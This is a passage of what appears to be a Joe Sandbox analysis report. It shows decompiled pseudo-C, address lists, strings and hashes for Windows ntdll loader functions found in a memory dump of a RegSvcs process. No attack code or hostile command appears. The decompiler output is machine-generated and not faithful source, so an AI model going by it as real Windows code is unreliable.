					goto L8;
				} else {
					goto L9;
				}
			}

0x00a78e0f
0x00a78e16
0x00a78e19
0x00a78e1b
0x00a78e21
0x00a78e7f
0x00a78e85
0x00ab9354
0x00ab936c
0x00ab9371
0x00ab937b
0x00ab9381
0x00ab9381
0x00ab937b
0x00a78e9d
0x00a78e9d
0x00a78e29
0x00a78e2c
0x00a78e38
0x00a78e3e
0x00a78e43
0x00a78eb5
0x00a78eb9
0x00ab92aa
0x00ab92af
0x00ab92e8
0x00ab92e8
0x00ab92af
0x00a78eb9
0x00a78e45
0x00a78e53
0x00a78e5b
0x00a78e5f
0x00a78e78
0x00a78e78
0x00a78e7d
0x00a78ec3
0x00a78ecd
0x00a78ed2
0x00a78ed2
0x00a78ec5
0x00a78ec5
0x00000000
0x00a78e7d
0x00a78e67
0x00a78ea4
0x00ab931a
0x00000000
0x00000000
0x00ab9320
0x00a78ea4
0x00a78e70
0x00ab9325
0x00ab9340
0x00ab9345
0x00ab9345
0x00a78e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Querying the active activation context failed with status 0x%08lx, xrefs: 00AB9357
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00AB932A
p+R, xrefs: 00A78E2C
minkernel\ntdll\ldrsnap.c, xrefs: 00AB933B, 00AB9367
LdrpFindDllActivationContext, xrefs: 00AB9331, 00AB935D

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c$p+R
API String ID: 0-3002551356
Opcode ID: cf803d1f994d9c1bb8e0f88574393999cf0dbfd00eed55e603442da7529f9cdf
Instruction ID: 2a5366188389ef58126a3b5b844b08fc8a2270b88db2fcc7259c65553a43526f
Opcode Fuzzy Hash: cf803d1f994d9c1bb8e0f88574393999cf0dbfd00eed55e603442da7529f9cdf
Instruction Fuzzy Hash: 18410732A80315AEDB35AB18DC4DA7AB3B4BB14744F15C569F90C975A1EF78ED808281

Uniqueness

Uniqueness Score: -1.00%

Function 00A58794 Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00A58794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E00A5934A() != 0) {
								_t159 = E00ACA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0xb35780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E00AC5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0xb35780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E00A5849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E00A58999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E00A58999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0xb35c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0xb35c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E00A62280(_t92, 0xb386cc);
															_t94 = E00B19DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E00A761A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0xb35c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E00A58A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0xb35c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0xb35c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E00A8F380(_t136, 0xa21184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E00A62280(_t108, 0xb386cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E00A761A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E00B19D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E00A5FFB0(_t118, _t156, 0xb386cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E00A89A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x00a58799
0x00a5879d
0x00a587a1
0x00a587a3
0x00a587a8
0x00a587c3
0x00a587c3
0x00a587c8
0x00a587d1
0x00a587d4
0x00a587d8
0x00a587e5
0x00a587ec
0x00aa9bfe
0x00aa9c00
0x00aa9c02
0x00aa9c08
0x00aa9c0d
0x00aa9c0f
0x00aa9c14
0x00aa9c2d
0x00aa9c32
0x00aa9c37
0x00aa9c3a
0x00aa9c3c
0x00aa9c42
0x00aa9c42
0x00aa9c3c
0x00aa9c02
0x00a587da
0x00a587df
0x00a587e3
0x00000000
0x00000000
0x00a587e3
0x00a587f2
0x00000000
0x00a587fb
0x00a587fd
0x00a587fe
0x00a5880e
0x00a5880f
0x00a58810
0x00a58814
0x00a5881a
0x00a5881c
0x00a5881f
0x00a58821
0x00a58822
0x00a58824
0x00a58826
0x00a5882c
0x00a5882e
0x00aa9c48
0x00aa9c48
0x00a58834
0x00a58834
0x00a58837
0x00000000
0x00000000
0x00a58837
0x00a5882e
0x00a5883d
0x00a58840
0x00a58843
0x00a58846
0x00a58849
0x00a5884c
0x00a5884e
0x00a58850
0x00a58852
0x00a58854
0x00a58857
0x00a588b4
0x00a588b6
0x00a588b6
0x00a58859
0x00a58859
0x00a58859
0x00a58861
0x00a58866
0x00a5886a
0x00a5893d
0x00a58941
0x00000000
0x00a58947
0x00a58947
0x00a5894a
0x00a5894c
0x00000000
0x00a58952
0x00a58955
0x00a5895a
0x00a5895d
0x00a5895d
0x00a5895f
0x00a58961
0x00a58961
0x00a58968
0x00000000
0x00000000
0x00a5896a
0x00a5896b
0x00a5896e
0x00000000
0x00a58970
0x00a58970
0x00a58970
0x00a58970
0x00a58972
0x00a58972
0x00a58974
0x00000000
0x00a5897a
0x00a5897a
0x00a5897d
0x00000000
0x00a58983
0x00aa9c65
0x00aa9c6d
0x00aa9c72
0x00aa9c75
0x00aa9c75
0x00aa9c82
0x00aa9c86
0x00aa9c87
0x00aa9c88
0x00aa9c89
0x00aa9c8c
0x00aa9c90
0x00aa9c95
0x00aa9c97
0x00aa9ca0
0x00aa9ca3
0x00aa9ca9
0x00aa9ca9
0x00000000
0x00aa9ca9
0x00aa9ca3
0x00000000
0x00aa9c97
0x00a5897d
0x00000000
0x00a58974
0x00a58988
0x00a58992
0x00a58996
0x00000000
0x00a58996
0x00a5894c
0x00000000
0x00a58870
0x00a5887b
0x00a5887d
0x00a5887f
0x00a58881
0x00a58884
0x00a58884
0x00a58886
0x00a58889
0x00a5888c
0x00a5888e
0x00a58891
0x00a58891
0x00a58898
0x00000000
0x00000000
0x00a5889a
0x00a5889b
0x00a5889e
0x00000000
0x00000000
0x00a588a0
0x00a588a8
0x00a588b0
0x00a588b2
0x00a588d3
0x00a588d5
0x00000000
0x00a588d7
0x00a588db
0x00a588dc
0x00a588e0
0x00a588e8
0x00a588ee
0x00a588f0
0x00a588f3
0x00a588fc
0x00a58901
0x00a58906
0x00a5890c
0x00a5890c
0x00a5890f
0x00a58916
0x00a58917
0x00a58918
0x00a58919
0x00a5891a
0x00a5891f
0x00a58921
0x00aa9c52
0x00aa9c55
0x00aa9c5b
0x00aa9cac
0x00aa9cc0
0x00aa9cc0
0x00aa9c55
0x00a58927
0x00a58927
0x00a5892f
0x00a58933
0x00000000
0x00a588f5
0x00a588f5
0x00000000
0x00a588f7
0x00a588f7
0x00a588fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00a588fa
0x00a588f5
0x00a588f3
0x00000000
0x00a588d5
0x00000000
0x00a588b2
0x00a588c9
0x00000000
0x00a588c9
0x00a5887f
0x00a5886a
0x00a58857
0x00a58852
0x00a588bf
0x00a588bf
0x00a587aa
0x00a587ad
0x00a587ae
0x00a587b4
0x00a587b5
0x00a587b6
0x00a587b8
0x00a587bd
0x00a587c1
0x00a587f4
0x00a587fa
0x00000000
0x00000000
0x00000000
0x00a587c1
0x00000000

Strings

LdrpDoPostSnapWork, xrefs: 00AA9C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00AA9C18
minkernel\ntdll\ldrsnap.c, xrefs: 00AA9C28

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 566b5bb3f8c1be69d470f3fcd5f60a5ac610ba31fbadbac91e35e60907e6eb20
Instruction ID: 26c67fa14fd2866c13785b75dbefeaebe990dd29d16a5a59293ca167a61e4c48
Opcode Fuzzy Hash: 566b5bb3f8c1be69d470f3fcd5f60a5ac610ba31fbadbac91e35e60907e6eb20
Instruction Fuzzy Hash: 8691F071A00616EFDF18DF59C881ABAB3B5FF44352BA44069EC05BB251DF34AD49CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A57E41 Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00A57E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E00A5CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E00A4C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0xb35780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E00AC5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0xb35780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E00A67D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00A67D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E00AC7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E00A67D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00A67D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E00AC7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E00A7A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E00A4B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x00a57e4c
0x00a57e50
0x00a57e55
0x00a57e58
0x00a57e5d
0x00a57e71
0x00a57f33
0x00a57e77
0x00a57e77
0x00a57e79
0x00a57e79
0x00a57e7e
0x00a57f45
0x00aa9848
0x00000000
0x00aa9848
0x00a57f4e
0x00a57f53
0x00a57f5a
0x00000000
0x00000000
0x00aa985a
0x00aa9862
0x00aa9866
0x00000000
0x00aa986c
0x00000000
0x00aa986c
0x00a57e84
0x00a57e84
0x00a57e8d
0x00aa9871
0x00a57eb8
0x00a57ec0
0x00a57ec0
0x00a57e9a
0x00aa987e
0x00000000
0x00000000
0x00aa9884
0x00aa988b
0x00aa98a7
0x00aa98ac
0x00aa98b1
0x00aa98b6
0x00aa98b8
0x00aa98b8
0x00aa98b9
0x00000000
0x00aa98b9
0x00a57ea0
0x00a57ea7
0x00000000
0x00000000
0x00a57eac
0x00a57eb1
0x00a57ec6
0x00a57ed0
0x00aa98cc
0x00a57ed6
0x00a57ed6
0x00a57ed6
0x00a57ede
0x00a57ee3
0x00aa98e3
0x00aa98f0
0x00aa9902
0x00aa98f2
0x00aa98fb
0x00aa98fb
0x00aa9907
0x00aa991d
0x00aa991d
0x00aa9907
0x00aa98e3
0x00a57ef0
0x00a57f14
0x00a57f14
0x00a57f1e
0x00aa9946
0x00a57f24
0x00a57f24
0x00a57f24
0x00a57f2c
0x00aa996a
0x00aa9975
0x00aa9975
0x00aa997e
0x00aa9993
0x00aa9993
0x00aa997e
0x00000000
0x00a57ef2
0x00a57efc
0x00a57f0a
0x00a57f0e
0x00aa9933
0x00000000
0x00aa9933
0x00000000
0x00a57f0e
0x00000000
0x00000000
0x00000000
0x00a57eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 00AA98A2
Could not validate the crypto signature for DLL %wZ, xrefs: 00AA9891
LdrpCompleteMapModule, xrefs: 00AA9898

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 88041078773c84446f516da0d8ea08b4c44f95b0e96fae2af6b5fc563d0f7a52
Instruction ID: 6d2e4cc839b01de7ade9f69a987b5f16096de0a8356471e29da52d87e1a0fc5c
Opcode Fuzzy Hash: 88041078773c84446f516da0d8ea08b4c44f95b0e96fae2af6b5fc563d0f7a52
Instruction Fuzzy Hash: 65510131A08744ABEB22CB68D946B2E77F4BF06715F1406A9EC55AB3E2D734ED04CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A4E620 Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00A4E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00A4F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E00A895D0();
						}
						if(_t78 != 0) {
							L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E00A8FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E00A8BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E00A89600();
					if(_t97 < 0) {
						goto L6;
					}
					E00A8BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00A4F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E00A8BB40(_t83, _t102 + 0x24, _t78);
								if(L00A543C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E00A8BB40(_t84, _t102 + 0x24, _t94);
									if(L00A543C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x00a4e620
0x00a4e628
0x00a4e62f
0x00a4e631
0x00a4e635
0x00a4e637
0x00a4e63e
0x00aa5503
0x00aa5503
0x00a4e64c
0x00a4e64c
0x00a4e651
0x00000000
0x00000000
0x00a4e661
0x00a4e665
0x00aa542a
0x00a4e715
0x00a4e71a
0x00a4e71c
0x00a4e720
0x00a4e720
0x00a4e727
0x00a4e736
0x00a4e736
0x00a4e743
0x00a4e743
0x00a4e673
0x00a4e678
0x00a4e67d
0x00a4e682
0x00a4e685
0x00a4e692
0x00a4e69b
0x00a4e6a3
0x00a4e6ad
0x00a4e6b1
0x00a4e6b2
0x00a4e6bb
0x00a4e6bf
0x00a4e6c0
0x00a4e6c8
0x00a4e6cc
0x00a4e6d5
0x00a4e6d9
0x00000000
0x00000000
0x00a4e6e5
0x00a4e6ea
0x00a4e6f9
0x00a4e70b
0x00a4e70f
0x00aa5439
0x00aa545e
0x00aa545e
0x00000000
0x00aa545e
0x00aa543b
0x00aa543e
0x00aa5440
0x00aa5445
0x00aa5472
0x00aa5475
0x00aa548d
0x00aa5493
0x00aa54a9
0x00000000
0x00000000
0x00aa54ab
0x00aa54b4
0x00aa54bc
0x00aa54c8
0x00aa54de
0x00aa54fb
0x00aa54e0
0x00aa54e6
0x00aa54eb
0x00aa54eb
0x00aa54de
0x00000000
0x00aa54bc
0x00aa5477
0x00aa547a
0x00aa5480
0x00aa5483
0x00aa5486
0x00aa548b
0x00000000
0x00000000
0x00000000
0x00aa548b
0x00000000
0x00000000
0x00000000
0x00000000
0x00aa5447
0x00aa5447
0x00aa5447
0x00aa5447
0x00aa544e
0x00000000
0x00000000
0x00aa5450
0x00aa5452
0x00aa5455
0x00aa545a
0x00000000
0x00000000
0x00000000
0x00aa545c
0x00aa546a
0x00aa546d
0x00aa546f
0x00000000
0x00aa546f
0x00a4e70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00A4E68C
@, xrefs: 00A4E6C0
InstallLanguageFallback, xrefs: 00A4E6DB

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: bbbfe197c603662ab786ad14c5358e7353b366b2f47cd3393a31e4b12950006f
Instruction ID: f12afd132d3b4855f7680d386410fa009638223c9ec2c8a0548fd62005be17aa
Opcode Fuzzy Hash: bbbfe197c603662ab786ad14c5358e7353b366b2f47cd3393a31e4b12950006f
Instruction Fuzzy Hash: 0751CE769087059BC714DF24C440AABB3E9BF89724F04092EF985E7290FB34DE44C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00B0E539 Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00B0E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E00B0BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E00B0BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
